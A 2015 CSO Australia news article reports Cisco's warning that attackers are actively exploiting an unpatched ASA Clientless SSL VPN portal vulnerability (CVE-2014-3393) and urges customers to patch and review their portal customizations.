Patch now: Cisco warns its firewall appliance is under attack

Cisco has warned customers that hackers are attacking un-patched versions of software that run its Adaptive Security Appliance (ASA) firewall.

Organisations using Cisco’s ASA firewall software are being urged to review a security update that the company released in October last year to address vulnerabilities in its ASA Clientless SSL VPN that exposed enterprises to remote attacks or could have allowed their infrastructure to serve up malware to others.

Cisco’s Product Security Incident Response Team (PSIRT) said on Wednesday that it is “aware of public exploitation of the Cisco ASA Clientless SSL VPN Portal Customization Integrity Vulnerability identified [as] CVE-2014-3393”.

“All customers that have customizations applied to their Clientless SSL VPN portal and regardless of the Cisco ASA Software release in use should review the security advisory and this blog post for additional remediation actions,” PSIRT incident manager Stefano De Crescenzo warned.

The vulnerability in the portal’s customization framework could allow an unauthenticated, remote attacker to modify its content, allowing the attacker to serve up cross-site scripting attacks, steal credentials or serve up malware, De Crescenzo said.

“Once the portal is compromised, changes are persistent. Reloading the device or changing the Cisco ASA Software does not delete the customization objects,” he added.

Network security specialist Alec Stuart-Muirk demonstrated an attack on Cisco’s WebVPN Portal last October at the Ruxcon security conference, which exploited the fact that Cisco’s Adaptive Security Device Manager retained old code in new versions of the software and ran all customisations through a public facing web browser.

The update that followed Stuart-Muirk’s presentation addressed 13 vulnerabilities in ASA, including two for its Clienteless SSL VPN — one which could trigger information leaks or a denial of service and a second, demonstrated by Stuart-Muirk, that could expose the software to numerous attacks.

It’s the latter of the two issues that’s been under attack since at least February 11, according to Cisco.

The warning from Cisco’s PSIRT comes after an exploit script was made available in the Metasploit penetration testing database and on other internet web sites.

Systems that are affected will have Clientless SSL VPN portal functionality enabled and a “default customization object or a newly created customization object for Clientless SSL VPN portal has been previewed in ASDM”.

This article is brought to you by Enex TestLab, content directors for CSO Australia.

Read more: Three adware-serving Android apps on Google Play reach millions

Upcoming IT Security Events

March 3rd, March 5th, March 9th 2015

Join CSO for the day@#csoperspectives and hear from @kimzetter @LeviathanSec

3 International Keynote speakers, 36 Key IT Security Industry Speaker, 21 Exhibitors, Security Analysts and many more.. Register today

Dont miss one of the biggest IT Security events in ANZ (registration is free, but seats are limited)

Join the CSO newsletter!

Error: Please check your email address.

Tags firewall appliancehackers attackingPSIRTattacksciscoAdaptive Security Appliance (ASA) firewallmalwareCSO AustraliapatchStefano De Crescenzovulnerability management

More about ASACiscoCSOEnex TestLabIT Security

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by Liam Tung

Latest Videos

  • 150x50

    CSO Webinar: The Human Factor - Your people are your biggest security weakness

    ​Speakers: David Lacey, Researcher and former CISO Royal Mail David Turner - Global Risk Management Expert Mark Guntrip - Group Manager, Email Protection, Proofpoint

    Play Video

  • 150x50

    CSO Webinar: Current ransomware defences are failing – but machine learning can drive a more proactive solution

    Speakers • Ty Miller, Director, Threat Intelligence • Mark Gregory, Leader, Network Engineering Research Group, RMIT • Jeff Lanza, Retired FBI Agent (USA) • Andy Solterbeck, VP Asia Pacific, Cylance • David Braue, CSO MC/Moderator What to expect: ​Hear from industry experts on the local and global ransomware threat landscape. Explore a new approach to dealing with ransomware using machine-learning techniques and by thinking about the problem in a fundamentally different way. Apply techniques for gathering insight into ransomware behaviour and find out what elements must go into a truly effective ransomware defence. Get a first-hand look at how ransomware actually works in practice, and how machine-learning techniques can pick up on its activities long before your employees do.

    Play Video

  • 150x50

    CSO Webinar: Get real about metadata to avoid a false sense of security

    Speakers: • Anthony Caruana – CSO MC and moderator • Ian Farquhar, Worldwide Virtual Security Team Lead, Gigamon • John Lindsay, Former CTO, iiNet • Skeeve Stevens, Futurist, Future Sumo • David Vaile - Vice chair of APF, Co-Convenor of the Cyberspace Law And Policy Community, UNSW Law Faculty This webinar covers: - A 101 on metadata - what it is and how to use it - Insight into a typical attack, what happens and what we would find when looking into the metadata - How to collect metadata, use this to detect attacks and get greater insight into how you can use this to protect your organisation - Learn how much raw data and metadata to retain and how long for - Get a reality check on how you're using your metadata and if this is enough to secure your organisation

    Play Video

  • 150x50

    CSO Webinar: How banking trojans work and how you can stop them

    CSO Webinar: How banking trojans work and how you can stop them Featuring: • John Baird, Director of Global Technology Production, Deutsche Bank • Samantha Macleod, GM Cyber Security, ME Bank • Sherrod DeGrippo, Director of Emerging Threats, Proofpoint (USA)

    Play Video

  • 150x50

    IDG Live Webinar:The right collaboration strategy will help your business take flight

    Speakers - Mike Harris, Engineering Services Manager, Jetstar - Christopher Johnson, IT Director APAC, 20th Century Fox - Brent Maxwell, Director of Information Systems, THE ICONIC - IDG MC/Moderator Anthony Caruana

    Play Video

More videos

Blog Posts